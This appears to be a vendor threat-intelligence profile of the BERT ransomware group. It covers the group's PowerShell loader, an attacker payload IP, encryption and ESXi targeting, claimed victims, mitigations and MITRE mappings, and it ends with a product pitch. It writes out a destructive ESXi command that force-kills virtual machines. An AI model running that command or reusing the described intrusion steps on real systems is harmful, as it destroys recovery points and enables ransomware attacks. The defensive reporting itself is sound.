Threat Actor Profile: BERT Ransomware Group

Overview

The BERT ransomware group, also tracked under the alias “Water Pombero”, is a financially motivated threat actor that has been active since at least early 2025. Since its emergence, BERT has been observed conducting ransomware operations across Asia, Europe, and North America, with confirmed targeting activity in countries including Brazil, the United Kingdom, Malaysia, Turkey, Taiwan, and the United States.

Unlike many ransomware groups that rely on highly bespoke malware ecosystems, BERT demonstrates a hybrid operational model combining simple but optimized ransomware binaries with a powerful PowerShell-based intrusion chain. This combination allows the group to maintain both speed and operational flexibility while minimizing development overhead. 

Initial Access and Intrusion Chain

BERT’s intrusion chain frequently begins with a PowerShell-based loader named start.ps1. This script acts as the primary execution mechanism during compromise and is responsible for multiple pre-encryption actions. 

Once executed, likely via spearphishing attachments (T1566.001) or malicious downloads, the loader performs a sequence of system-level modifications. These include: 

• Disabling Microsoft Defender and firewall protections  

• Attempting User Account Control (UAC) bypass (T1548.002)  

• Modifying registry settings to weaken system security  

• Escalating privileges before payload execution  

After preparation, the script retrieves the ransomware payload from a Russian-registered IP address: 185.100.157.74, using HTTP/HTTPS-based communication channels. 

This reliance on a centralized download location and PowerShell execution highlights a streamlined but effective initial access model centered on living-off-the-land binaries (LOLBins) and script-based execution rather than complex exploit chains. 

Ransomware Architecture and Technical Behavior 

Windows Variants 

On Windows systems, BERT ransomware uses relatively compact compiled codebases, often .NET-based, with a focus on efficiency rather than complexity. The encryption routine commonly relies on AES, while some variants also incorporate Salsa20, ChaCha, or RC4, depending on the build version. 

Key behavioral characteristics include: 

• Process termination based on predefined string matches  

• File system scanning using either:  

• Single-threaded enumeration (older variants), or  

• Multi-threaded concurrent queues with per-drive workers (newer variants)  

• Immediate encryption execution without full pre-listing of file paths in newer builds  

This evolution from sequential scanning to parallelized encryption workflows significantly increases execution speed and reduces response time for defenders. 

Encrypted files are renamed using distinctive extensions such as: 

• .encryptedbybert  

• .encryptedbybert3  

• .hellofrombert  

These extensions serve both operational and psychological purposes, reinforcing attribution and signaling successful compromise. 

Linux and ESXi Targeting 

BERT also maintains a Linux-compatible ransomware variant, which is particularly notable for its focus on virtualization infrastructure. The Linux version is designed for high-concurrency execution (up to 50 threads), allowing rapid encryption across large file systems. 

A defining feature of this variant is its ability to target VMware ESXi environments, where it attempts to terminate virtual machines using commands such as: 

esxcli vm process kill –type=force 

This behavior indicates a deliberate attempt to destroy recovery points before encryption completes, ensuring maximum disruption. 

Additionally, evidence suggests that BERT may have borrowed or repurposed components from the REvil ransomware ecosystem, particularly its Linux-based ESXi locker functionality. This is inferred from observed code similarities rather than confirmed attribution. 

Data Leak and Extortion Infrastructure 

BERT operates a dark web data leak site (DLS) where it publishes victim information. Unlike many ransomware-as-a-service (RaaS) groups, BERT does not rely on a structured negotiation portal. Instead, communications with victims occur through privacy-focused messaging channels, with ransom payments requested exclusively in Bitcoin (BTC). 

The DLS typically lists victims along with: 

• Organization URL  

• Reported revenue figures  

• Attack or breach dates  

This structured exposure of financial and operational data suggests an intent to increase extortion pressure by highlighting victim value and breach timelines. 

Known Victimology and Campaign Activity 

Throughout 2025, BERT has claimed responsibility for multiple high-impact intrusions. 

On 22 May 2025, the group allegedly targeted a Malaysia-based construction and infrastructure organization. BERT claimed it exfiltrated approximately 5TB of data, releasing a 65.3GB archive as proof. The leaked materials reportedly included financial records and internal documentation. 

Another notable case involved a Taiwan-based manufacturer specializing in semiconductor and automation technologies. BERT claimed to have stolen over 5TB of data, publishing a 64.3GB sample archive containing engineering blueprints, client orders, financial data, and internal project files. 

The organization reportedly disclosed a cyber incident to the Taiwan Stock Exchange on 20 April 2025, stating that its systems were compromised and some machines were infected, though it initially claimed no confirmed data leakage or operational disruption. 

On 4 April 2025, BERT launched a dedicated leak entry targeting a U.S.-based ticketing services provider. The group published 22.9GB of stolen data, including: 

• Financial records. 

• A customer database containing 8,460 entries with names and email addresses. 

• An order log with 468 entries, including billing information. 

BERT claimed the breach occurred approximately two months before disclosure and asserted that the victim’s organization refused to engage in negotiation. 

Tooling and Malware Ecosystem 

Across observed campaigns, BERT relies heavily on a single dominant tool: a PowerShell-based Remote Access Trojan (RAT). This RAT functions as both a reconnaissance and control mechanism, enabling: 

• Remote command execution  

• Registry modification  

• File upload/download  

• Process manipulation  

• System information collection  

• ZIP archive handling  

• Script execution from remote servers  

Conclusion 

BERT (Water Pombero) is an active ransomware group that uses PowerShell-based loaders, fast multi-threaded encryption, and ESXi-targeting Linux variants to rapidly disrupt and encrypt systems while exfiltrating large volumes of data across global targets. Its focus on speed, virtualization abuse, and script-based intrusion makes it a persistent risk to hybrid enterprise environments.  

Organizations can reduce exposure by adopting intelligence-led detection and automated response capabilities; Cyble provides real-time threat intelligence and AI-driven defense through Cyble Blaze to help identify and block ransomware activity early, and teams can book a personalized demo to explore proactive protection against actors like BERT. 

Recommendations and Mitigation Strategies 

• Harden Email Security Controls: Deploy advanced phishing detection, attachment sandboxing, and URL filtering to prevent delivery of malicious PowerShell loaders such as start.ps1 used for initial access.  

• Restrict PowerShell Usage: Enforce constrained language mode, enable script block logging, and limit PowerShell execution to signed scripts to reduce abuse of PowerShell-based loaders and RAT activity.  

• Implement Multi-Factor Authentication (MFA): Require MFA across all critical systems, especially for remote access, administrative accounts, and VPNs to mitigate credential abuse and lateral movement.  

• Secure and Monitor ESXi Environments: Disable unnecessary SSH access, patch ESXi vulnerabilities, and monitor for suspicious commands (e.g., forced VM termination via esxcli) to prevent disruption of virtual infrastructure.  

• Apply Network Segmentation: Isolate critical systems, backups, and virtualization infrastructure to limit the spread of ransomware and reduce blast radius during compromise.  

• Deploy Endpoint Detection and Response (EDR): Use EDR/XDR solutions to detect behaviors such as process termination, registry modification, defense disabling, and high-speed encryption activity.  

• Maintain Offline and Immutable Backups: Regularly back up critical data and ensure backups are stored offline or in immutable storage to prevent tampering or deletion during attacks.  

• Monitor Outbound Traffic and Block Malicious IPs: Inspect network traffic for suspicious outbound connections, including communication with known malicious infrastructure such as hardcoded IPs used for payload retrieval.  

• Enforce Least Privilege Access: Limit administrative privileges and regularly audit account permissions to reduce the impact of privilege escalation and unauthorized system changes.  

• Conduct Security Awareness Training: Educate users on phishing, malicious attachments, and social engineering tactics to reduce the likelihood of initial compromise through user interaction. 

MITRE ATT&CK Techniques Associated with BERT Ransomware Group 

• Spearphishing Attachment (T1566.001 | Initial Access): Delivered malicious email attachments containing the PowerShell loader to initiate compromise.  

• PowerShell (T1059.001 | Execution): Executed the start.ps1 loader to disable security controls, modify the registry, and download the ransomware payload from a hardcoded IP.  

• User Execution (T1204.002 | Execution): Relied on user interaction to run malicious PowerShell scripts or disguised dropper binaries embedded in phishing emails or fake software.  

• Registry Run Keys / Startup Folder (T1547.001 | Persistence): Likely maintained persistence by modifying registry keys or startup folders using PowerShell or .NET binaries.  

• Bypass User Account Control (T1548.002 | Privilege Escalation): Leveraged UAC bypass techniques within the loader to gain elevated privileges before deploying ransomware.  

• Obfuscated Files or Information (T1027 | Defense Evasion): Used Base64 encoding and other obfuscation methods in scripts and binaries to evade detection. 

• Masquerading (T1036 | Defense Evasion): Disguised ransomware binaries with misleading names and future-dated timestamps (e.g., 2047, 2076) to hinder analysis.  

• Modify Registry (T1112 | Defense Evasion): Altered registry settings to weaken system defenses and avoid detection.  

• Disable or Modify Tools (T1562.001 | Defense Evasion): Disabled Windows Defender, firewall, and other endpoint protection mechanisms during execution.  

• System Information Discovery (T1082 | Discovery): Collected system details to tailor execution, such as avoiding specific directories or duplicate encryption.  

• File and Directory Discovery (T1083 | Discovery): Scanned directories to identify files for encryption or exfiltration.  

• SMB/Windows Admin Shares (T1021.002 | Lateral Movement): Attempted to spread across the network using shared drives and administrative shares.  

• Automated Collection (T1119 | Collection): Crawled file systems to gather data for encryption and potential exfiltration in double-extortion scenarios.  

• Exfiltration Over C2 Channel (T1041 | Exfiltration): Transferred stolen data over command-and-control channels, likely via HTTPS.  

• Web Protocols (T1071.001 | Command and Control): Communicated with external infrastructure (e.g., 185.100.157.74) over HTTP/HTTPS to retrieve payloads. 

• Non-Application Layer Protocol (T1095 | Command and Control): Used alternative communication channels for data transfer or secondary C2 activity.  

• Data Encrypted for Impact (T1486 | Impact): Encrypted files using AES, Salsa20, ChaCha, or RC4, appending extensions like .encryptedbybert or .hellofrombert.  

• Service Stop (T1489 | Impact): Terminated ESXi virtual machines and related processes on Linux systems to maximize disruption before encryption.  

• Inhibit System Recovery (T1490 | Impact): Likely deleted shadow copies and restore points to prevent recovery.  

• Resource Hijacking (T1496 | Impact): Utilized high system resources with 50+ concurrent threads on Linux to accelerate encryption.